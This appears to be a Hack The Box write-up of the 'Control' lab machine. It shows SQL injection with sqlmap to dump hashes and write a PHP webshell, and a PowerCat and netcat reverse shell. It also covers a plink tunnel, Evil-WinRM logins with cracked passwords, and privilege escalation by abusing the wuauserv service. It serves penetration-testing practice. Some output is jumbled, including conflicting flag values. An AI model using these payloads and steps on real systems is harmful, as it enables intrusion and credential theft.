htb-control-nl

As always we start with a nmap scan

# Nmap 7.80 scan initiated Fri Jan 3 10:25:07 2020 as: nmap -sC -sV -oA control-nmap 10.10.10.167
Nmap scan report for 10.10.10.167
Host is up (0.033s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql?
| fingerprint-strings: 
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, HTTPOptions, Help, Kerberos, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: 
|_ Host '10.10.16.70' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=1/3%Time=5E0F5CE5%P=x86_64-pc-linux-gnu%r(HTT
SF:POptions,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.70'\x20is\x20not\x2
SF:ookie,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.70'\x20is\x20not\x2\x04Host\x20'10\.10\.16\.70'\x20is\x20not\x20allowed\x20to\x20conne
SF:ct\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 3 10:25:32 2020 -- 1 IP address (1 host up) scanned in 25.52 seconds

There is a website hosted in the default tcp port called “Fidelity”

There are 4 pages, index page, an about page, Admin page and login page. The admin and login pages did not provide any login form, but with an error “Access Denied: Header Missing. Please ensure you go through the proxy to access this page“. This error pointing towards a misconfiguration. So I proceed to analyze the source-code.

The source-code of index.php has commented section with a message -To-do:

This revealed an internal IP address: 192.168.4.28d. I fire-up the burp to see if there is any requests being sent ot receives.

The Burp request also showed the request isn’t going to the webserver, but the same error comes if I request to access admin.php or login.php pages.

So, to access these either you need to have a proxy which allows you the access or simulate that you are using the proxy by adding HTTP header “X-Forwarded-For”. The Burp is useful to add such headers, so I’m going to use my already running Burp. I’m assuming that the IP 192.168.4.28 for x-forwarded-for IP (proxy) because this is the only internal IP I’ve found in the websites source-code and it actually worked.

As soon as I forward the request in Burp, I was able to access the admin panel (or a product page).

SQLi

So the next step was to find the SQLi in the products table. I used burp to extract search requests from the database to use exploit it using SQLMAP.

The Info:

I saved the info as control.txt. and run the SQLMAP using this command: sqlmap –all -r control.txt –batch

The SQLMAP successfully cracked the database and got me what I was looking for – usernames and passwords (in hash)

I can’t do anything with the passwords I have, I can’t log in to the system unless I upload the shell to get RCE from SQLi. So what I decided is to use Burp again to send my PHP payload to create a reverse shell inside the database system. I found several RCEs, but used this one. I modified a bit and my final payload would look like this:

Easier is to use

root@kali:~/htb/control# cat s2.php
<?php echo shell_exec($_GET["cmd"]); ?>
root@kali:~/htb/control# sqlmap -r req --dbms mysql --file-write=s2.php --file-dest="C:/Inetpub/wwwroot/s2.php"
___
__H__
___ ___[.]_____ ___ ___ {1.3.8#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:03:32 /2020-02-27/

[03:03:32] [INFO] parsing HTTP request from 'req'
[03:03:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productName (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: productName=-4687' OR 8277=8277#

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: productName=blah' AND (SELECT 1098 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(1098=1098,1))),0x717a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SQcG

Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: productName=blah';SELECT SLEEP(5)#

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: productName=blah' AND (SELECT 7645 FROM (SELECT(SLEEP(5)))VIiw)-- ZBOf

Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: productName=blah' UNION ALL SELECT NULL,CONCAT(0x716b6b7671,0x7474516e41764359637658616b4e77796557634a77594f6d7a4247674e4c5476696b6e4644446964,0x717a717171),NULL,NULL,NULL,NULL#
---
[03:03:32] [INFO] testing MySQL
[03:03:33] [INFO] confirming MySQL
[03:03:33] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 10 or 2016
web application technology: Microsoft IIS 10.0, PHP 7.3.7
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[03:03:33] [INFO] fingerprinting the back-end DBMS operating system
[03:03:33] [INFO] the back-end DBMS operating system is Windows
[03:03:34] [WARNING] potential permission problems detected ('Access denied')
[03:03:34] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done)
do you want confirmation that the local file 's2.php' has been successfully written on the back-end DBMS file system ('C:/Inetpub/wwwroot/s2.php')? [Y/n] y
[03:03:46] [INFO] the local file 's2.php' and the remote file 'C:/Inetpub/wwwroot/s2.php' have the same size (41 B)
[03:03:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'
[03:03:46] [WARNING] you haven't updated sqlmap for more than 208 days!!!

[*] ending @ 03:03:46 /2020-02-27/

root@kali:~/htb/control#

POWERCAT REVERSE SHELL

Now, I need a reverse connection from the Control machine. Since the machine is windows, I would go for PowerShell reverse shells. After reading and a lot of research, I decided to use PowerCAT.

Setup:

  • I download the PowerCAT.ps1 to the working directory
  • Setup the Python HTTP server: python -m SimpleHTTPServer 8081
  • A netcat listener: nc –lvnp 8080
  • And finally “calling it from the website” to make it work (very simple words).

The Activator:

ref: https://www.sherlocklee.top/2019/09/28/Reverse-Shell/

As soon as I run the above caller my netcat listener got me the reverse shell:
root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.167 - - [27/Feb/2020 03:17:19] "GET /powercat.ps1 HTTP/1.1" 200 -
root@kali:~/htb/control# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.167] 50670
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot>whoami
whoami
nt authority\iusr

I have access to the system, however, I’m not able to list the user directories. There are two users, an Administrator and Hector – I have access denied to both user directories.

BUILDING THE TUNNEL: (THIS IS A FAILED STEP, PLEASE PROCEED TO ” WHITE WINTER WOLF WEBSHELL” SECTION)

I fired-up netstat -ano to see the processes running and listening.

I found that the WinRM service is active and running (TCP [::]:5985 [::]:0 LISTENING 4). This service running locally I’m not able to access externally, so the next step is to create a tunnel between my Kali and the Control machine. I will use the windows binary in kali PuTTY PLINK to create the tunnel.

Uploading PLink.exe

Now this seems to be a hard task for me. I tried following but I have an error:

Setup Python SMBServer

Copy PLink.exe using Command Prompt:

WHITEWINTERWOLF WEBSHELL

So, my plan to copy PuTTY PLINK using good boy way was failed so badly that I went to sleep shutting down my laptop. In the sleep, I was told by the angels that I could use WhiteWinterWolf’s Webshell to upload my PuTTY PLINK Here is what I did:

  • I copied Webshell PHP script on to a file called “nshell.php”
  • I used the same old resources text I used to run SQLMAP in my earlier step
  • I created a new SQLMAP query to copy the script into C:\inetpub\wwwroot\uploads\

My new SQLMAP script:

After running the SQLMAP, my new shell was successfully uploaded.

WhiteWinterWolf’s PHP web shell Upload

As soon as I have the confirmation from SQLMAP that my shell was uploaded successfully, I opened my browser and browsed the shell:

I upload the nc.exe and PuTTY PLINK to be sure to make at least 1 connection run properly.

Uploading PLink.exe using WhiteWinterWolf’s PHP web shell

I’m going to run the PLink.exe first because I wanted to test if this can help me. I know nc.exe will work for sure, but I haven’t tried Plink for tunneling. Let us try.

The tunnel was successfully created

PuTTY PLINK Tunnel Between Windows and Kali Machines

Now I can run EvilWiNRM localy on the Control machine. However, I’m still low privileged user, so I need to run EvilWinRM as user Hector. if you remember in my initial SQLMAP scan it revealed 3 users’ password hashes.

hector : password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
manager : password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA clear-text password: l3tm3!n
root : password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8

SQLMAP managed to get the user Manager’s password in clear text, however, our Hector’s password is still unknown, I used John to crack the password. l33th4x0rhector

0e178792e8fc304a2e3133d535d38caf1da3cd9d:l33th4x0rhector

Time to run EvilWinRM as Hector: ( and getting user.txt )

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 127.0.0.1 -u hector -p 'l33th4x0rhector'

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Hector\Documents> dir
*Evil-WinRM* PS C:\Users\Hector\Documents> cd ..
*Evil-WinRM* PS C:\Users\Hector> cd Desktop
*Evil-WinRM* PS C:\Users\Hector\Desktop> type user.txt
d8782dd01fb15b72c4b5ba77ef2d472b
*Evil-WinRM* PS C:\Users\Hector\Desktop>

GETTING ROOT

In order to get Root, we need to escalate the privilege of our current user, Hector. This article and this article gives a great way of windows privesc. I had to read several such articles to find the right way to become Administrator of Control machine.

Let us see what is our user Hector is capable to do?

Is there any Administrator groups?

So the cmdkey /list also didn’t give me any hint of stored credentials in the box. Its getting a bit hard for me at this stage.

The Windows ACL (Access Control List) is the most important command to run post-exploit. This gives a hint about how the current compromised user can help in privesc. I’m concentrating on the System’s CurrentControlSet to see what type of rights our user Hector has. The command is: get-acl HKLM:\System\CurrentControlSet\services* | Format-List * | findstr /i "Hector Users Path

The command returned with huge list of ACL of user Hector:

ABUSING SERVICES

I have a list of services Hector can run with full control. The service “wuauserv” is what I should use as per the hint I received in HTB Forum.

Windows WUAUServ is a system service of the Windows Update feature. It runs only when Windows Update is running. This service runs for a couple of minutes and verifies if there is a Windows Update is going on or no if the service is not running it stops itself.

If you remember the retired machine Helpline, I exploit the windows print spool service to run my nc.exe. I’m going to use the same practice to exploit this machine.

*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> copy nc.exe C:\windows\system32\spool\drivers\color\nc.exe

START LISTENING:

root@kali:~/htb# rlwrap nc -nlvp 4444
listening on [any] 4444 ...

START SERVICE

*Evil-WinRM* PS C:\Users\Hector\Documents> get-service wuauserv

Status Name DisplayName 
------ ---- ----------- 
Stopped wuauserv Windows Update

*Evil-WinRM* PS C:\Users\Hector\Documents> start-service wuauserv

REVERSE SHELL AS ADMINISTRATOR

root@kali:~/htb# rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.167] 50826
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd /
C:\>cd Users/Administrator/Desktop
C:\Users/Administrator/Desktop>type root.txt
d8782dd01fb15b72c4b5ba77ef2d472b
*Evil-WinRM* PS C:\Users\Hector\Documents> sc.exe query wuauserv

SERVICE_NAME: wuauserv 
TYPE : 20 WIN32_SHARE_PROCESS 
STATE : 4 RUNNING 
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\Hector\Documents> get-process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
*Evil-WinRM* PS C:\Users\Hector\Documents>  taskkill.exe /f /pid 728
SUCCESS: The process with PID 728 has been terminated.

user=>d8782dd01fb15b72c4b5ba77ef2d472b              root=>8f8613f5b4da391f36ef11def4cec1b1

Author : Puckiestyle

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *